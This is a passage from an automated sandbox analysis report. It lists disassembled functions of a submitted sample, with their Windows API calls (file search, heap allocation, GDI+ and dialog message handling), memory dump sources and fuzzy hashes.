                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherItemUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4250310104-0
                                                                                                                                                                            • Opcode ID: 3a74e129bd6b1763d4e0debca2948a52d1d83d0f5cd70b66980650c22ccc6b80
                                                                                                                                                                            • Instruction ID: 0221722e77c6aea6de5c9a2d8c338dfd2b34529ae0b1167d69dafbfed2caf189
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a74e129bd6b1763d4e0debca2948a52d1d83d0f5cd70b66980650c22ccc6b80
                                                                                                                                                                            • Instruction Fuzzy Hash: EAC04C7641C240BFCB015BA0AD1CC2FBFA9AB95311F00C94AB5A980120C6368410DB11
                                                                                                                                                                            Function 002427E0 Relevance: 1.8, APIs: 1, Instructions: 306COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                                                            • Opcode ID: 8268776aed72606a46e226840eb24fb836350dd2e1f93d427ffc1be92f7cf425
                                                                                                                                                                            • Instruction ID: 3461a8cb2039dc7919c2a5658fc0069a74f35da39393ba2dc52f9e408ac5fb49
                                                                                                                                                                            • Opcode Fuzzy Hash: 8268776aed72606a46e226840eb24fb836350dd2e1f93d427ffc1be92f7cf425
                                                                                                                                                                            • Instruction Fuzzy Hash: 0FC19030A24256DBDF29DF66C8947AD7BE4AF09300F5840B9FC05DF286C7709869CBA1
                                                                                                                                                                            Function 002420B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002420B7
                                                                                                                                                                              • Part of subcall function 002480EC: __EH_prolog3.LIBCMT ref: 002480F3
                                                                                                                                                                              • Part of subcall function 00252815: __EH_prolog3.LIBCMT ref: 0025281C
                                                                                                                                                                              • Part of subcall function 002476E7: __EH_prolog3.LIBCMT ref: 002476EE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                                                            • Opcode ID: 84c43928ac99fd661ad9710aff5e64db91db7d5091d0afddf6c17080f196fb39
                                                                                                                                                                            • Instruction ID: a15a8e4f203bcc384e5745d978669e7077b3db8ff62651e3ade2bffdff6d179c
                                                                                                                                                                            • Opcode Fuzzy Hash: 84c43928ac99fd661ad9710aff5e64db91db7d5091d0afddf6c17080f196fb39
                                                                                                                                                                            • Instruction Fuzzy Hash: 6951E4B1A15780CEDB49DF6A84807C9BBE0AF59300F0881BAEC4DDE69BD7744254CB61
                                                                                                                                                                            Function 0024B3E1 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024B3E8
                                                                                                                                                                              • Part of subcall function 0024F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?,?,?,?), ref: 0024F739
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseFindH_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2672038326-0
                                                                                                                                                                            • Opcode ID: 9c4465d60efdfc0a4e6690c892b09dee195eb5a3c9e9852b124163aa7f1b7afc
                                                                                                                                                                            • Instruction ID: 48ba2026a105871a20de92f80c76445250154297100a344b9e8924da34c6a8d9
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c4465d60efdfc0a4e6690c892b09dee195eb5a3c9e9852b124163aa7f1b7afc
                                                                                                                                                                            • Instruction Fuzzy Hash: 38419B70920709CFDB29DFA9C895BA9B7F0BF05304F54482DE05A9B352D734A865CF25
                                                                                                                                                                            Function 00242C30 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00242C37
                                                                                                                                                                              • Part of subcall function 0025880E: __EH_prolog3.LIBCMT ref: 00258815
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3355343447-0
                                                                                                                                                                            • Opcode ID: 0ba66f60f906942f924c744378f90e12ad4faccd21f01e77777bd5f763362539
                                                                                                                                                                            • Instruction ID: 35182fb5297a93254a892a6db4ff294ff724388d43b54d44aeabb2862c36885c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba66f60f906942f924c744378f90e12ad4faccd21f01e77777bd5f763362539
                                                                                                                                                                            • Instruction Fuzzy Hash: D0310C7192120CEACF19EFE5D8D59EEBBB9AF18300F54012AF405B7251DB7099A9CF20
                                                                                                                                                                            Function 002597A4 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                                                            • Opcode ID: 5916d0d080048be0c438bee1772d10711276706b44c2af66114bbc4040d4125c
                                                                                                                                                                            • Instruction ID: aff1a1dfd17e914bec60c6e44f17ac123cc69c0d088d140dc8d8e8e3948cc750
                                                                                                                                                                            • Opcode Fuzzy Hash: 5916d0d080048be0c438bee1772d10711276706b44c2af66114bbc4040d4125c
                                                                                                                                                                            • Instruction Fuzzy Hash: FE21D671D206229BEF189F748C49A5E76A4BF05314F05063AE909AB2C1D7749DA4CBE8
                                                                                                                                                                            Function 0024D771 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                                                            • Opcode ID: 8d35ae40094e22288e5b1c1d0948a77bde76c3fd01782c2b2d2a598cd423e0d4
                                                                                                                                                                            • Instruction ID: c25bb44877a17e1ebcec2526ddcfaccb5cd5f37ae0be909208052d8c562f7bb6
                                                                                                                                                                            • Opcode Fuzzy Hash: 8d35ae40094e22288e5b1c1d0948a77bde76c3fd01782c2b2d2a598cd423e0d4
                                                                                                                                                                            • Instruction Fuzzy Hash: 3B21B572A1061A9BCB19DFE8CC81AAFB7B9BF88300F14001AF504B7241DB709E558B94
                                                                                                                                                                            Function 0024EAF3 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2427045233-0
                                                                                                                                                                            • Opcode ID: 16c7085abe4183ec508b7c9e46425f0cb0c814151e8a2fd16d26cbcc54836c41
                                                                                                                                                                            • Instruction ID: 7e0060ba1971cbe9c7c0b095d1e50a91c75e2943ceb6dbc21a2e3d681666eaab
                                                                                                                                                                            • Opcode Fuzzy Hash: 16c7085abe4183ec508b7c9e46425f0cb0c814151e8a2fd16d26cbcc54836c41
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A21E730621318AEEF25DF64C842FEEB3A9FF12758F161558F482A7181C7749D69CBA0
                                                                                                                                                                            Function 0026437D Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2427045233-0
                                                                                                                                                                            • Opcode ID: e4ef6e9c7f72f6d7f17a38491f0297d6dd73c56bb2f89ad6890054588f484591
                                                                                                                                                                            • Instruction ID: 5b78446a59a6dc104bc110177c1292159fc9118ca2c39c10b7c47a75364e10d6
                                                                                                                                                                            • Opcode Fuzzy Hash: e4ef6e9c7f72f6d7f17a38491f0297d6dd73c56bb2f89ad6890054588f484591
                                                                                                                                                                            • Instruction Fuzzy Hash: C4216F70920208DEDF09EFE4D886BDEBBB9AF48300F54001AF504E7291DA349AE5CF61
                                                                                                                                                                            Function 00264300 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2427045233-0
                                                                                                                                                                            • Opcode ID: 429b43dd0885af3b86181a87051f79684850b4777e6de9f1cd201545228e4861
                                                                                                                                                                            • Instruction ID: 93aa6f1445ed5c3c351e05ba427f8ed23f411f7c8d6391e0639e8dca8b76a574
                                                                                                                                                                            • Opcode Fuzzy Hash: 429b43dd0885af3b86181a87051f79684850b4777e6de9f1cd201545228e4861
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B018171860218EADB01FBE0C886BDEB7BCAF14305F544065F404AB282C7389BA9CF71
                                                                                                                                                                            Function 0027040E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,0026535E,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?,?,?,?), ref: 00270440
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            • Opcode ID: 8988b5117bf3774b207b6c7b46e348eaf75759f7b872dbb8388660a98cdf3ba9
                                                                                                                                                                            • Instruction ID: 971c86f5acded8680aaee4c2419a56c039fbca23379487dcbee9155b44fd0c05
                                                                                                                                                                            • Opcode Fuzzy Hash: 8988b5117bf3774b207b6c7b46e348eaf75759f7b872dbb8388660a98cdf3ba9
                                                                                                                                                                            • Instruction Fuzzy Hash: 0BE09B31131222D6DA713FB5AC65B5B7A48EF413B0F1AC121FE4CA6191CBB0CC6485E1
                                                                                                                                                                            Function 0024F711 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0024F826: __EH_prolog3_GS.LIBCMT ref: 0024F830
                                                                                                                                                                              • Part of subcall function 0024F826: FindFirstFileW.KERNELBASE(?,?,00000274,0024F733,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?), ref: 0024F859
                                                                                                                                                                              • Part of subcall function 0024F826: FindFirstFileW.KERNEL32(?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024F8A4
                                                                                                                                                                              • Part of subcall function 0024F826: GetLastError.KERNEL32(?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049,?,00000000), ref: 0024F902
                                                                                                                                                                            • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?,?,?,?), ref: 0024F739
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 765066492-0
                                                                                                                                                                            • Opcode ID: 5ceaa0b041567200773bbd248340eb1613f927ea00adf9b948e198d2f765618a
                                                                                                                                                                            • Instruction ID: f13b8e00ece7540c7c7547d26f8d6df46f12680f9846c6af22f474a42e43dc05
                                                                                                                                                                            • Opcode Fuzzy Hash: 5ceaa0b041567200773bbd248340eb1613f927ea00adf9b948e198d2f765618a
                                                                                                                                                                            • Instruction Fuzzy Hash: D9F08231419750EACF652B644904A8BBFD46F56360F104B09F0E912592C2749464DB22
                                                                                                                                                                            Function 002573F8 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 0025742D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExecutionStateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2211380416-0
                                                                                                                                                                            • Opcode ID: 13fe2329a4ba520c1d9efb59cbf4b74fdd1e769749824a956cb5970098553bd2
                                                                                                                                                                            • Instruction ID: 374b4f7ec99d4df6277ab2e65afa8d4da1fb5d074a5d5f291496ca2b4d042d36
                                                                                                                                                                            • Opcode Fuzzy Hash: 13fe2329a4ba520c1d9efb59cbf4b74fdd1e769749824a956cb5970098553bd2
                                                                                                                                                                            • Instruction Fuzzy Hash: 87D0C21072901022EE157B2438897FE190E4F82312F090029B804361938AE408AE97EE
                                                                                                                                                                            Function 002411DD Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00241206
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                            • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                                                                                                                                            • Instruction ID: f5145a81073892ced3d5dc667e026a2b825afbd12bd11c088c9aefdb57e49220
                                                                                                                                                                            • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                                                                                                                                            • Instruction Fuzzy Hash: 28D05E766226134E872CEF34C46682E76946E50305720422DF52ADA681DF21CDB5CE15
                                                                                                                                                                            Function 0025EB06 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0025EB0C
                                                                                                                                                                              • Part of subcall function 0025E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0025E86A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1915507550-0
                                                                                                                                                                            • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                                                                                                                                            • Instruction ID: 22eb9dbedf3494fc5e0924d59550a98ad271efa95441730feec5e4f9ef491b7e
                                                                                                                                                                            • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                                                                                                                                            • Instruction Fuzzy Hash: BAD0A730220209B6DF092F20CC0297E7698EF00346F408021BC0285150E9B0DB349554
                                                                                                                                                                            Function 00264231 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00264256
                                                                                                                                                                              • Part of subcall function 00260678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00260689
                                                                                                                                                                              • Part of subcall function 00260678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0026069A
                                                                                                                                                                              • Part of subcall function 00260678: IsDialogMessageW.USER32(000103E6,?), ref: 002606AE
                                                                                                                                                                              • Part of subcall function 00260678: TranslateMessage.USER32(?), ref: 002606BC
                                                                                                                                                                              • Part of subcall function 00260678: DispatchMessageW.USER32(?), ref: 002606C6
